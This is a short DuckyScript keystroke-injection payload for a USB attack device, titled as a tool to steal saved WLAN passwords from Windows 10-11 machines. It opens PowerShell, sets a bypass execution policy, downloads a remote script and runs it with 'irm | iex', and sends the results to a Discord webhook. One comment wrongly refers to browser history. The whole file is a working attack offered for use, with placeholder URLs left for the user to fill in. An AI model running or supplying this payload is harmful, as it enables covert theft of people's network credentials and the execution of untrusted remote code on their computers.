REM ###################################################################
REM #                                                                 |
REM # Title        : WLAN-Windows-Passwords-Discord-Exfiltration      |
REM # Author       : true_lock                                        |
REM # Description: A script used to steal target WLAN Passwords.      |
REM # Category     : Credentials                                      |
REM # Target       : Windows 10-11                                    |
REM # Version      : 2.0                                              |
REM #                                                                 |
REM ###################################################################

REM Browser History to Discord Webhook

GUI r
STRINGLN powershell
STRINGLN Set-ExecutionPolicy Bypass -Scope Process -Force

REM Replace the example urls with your real ones
DEFINE #SCRIPT_URL https://example.com/script.ps1
DEFINE #WEBHOOK https://discord.com/api/webhooks/

REM Saved WiFi Info to Discord Webhook
STRINGLN $whuri='#WEBHOOK'; irm #SCRIPT_URL | iex

STRINGLN exit
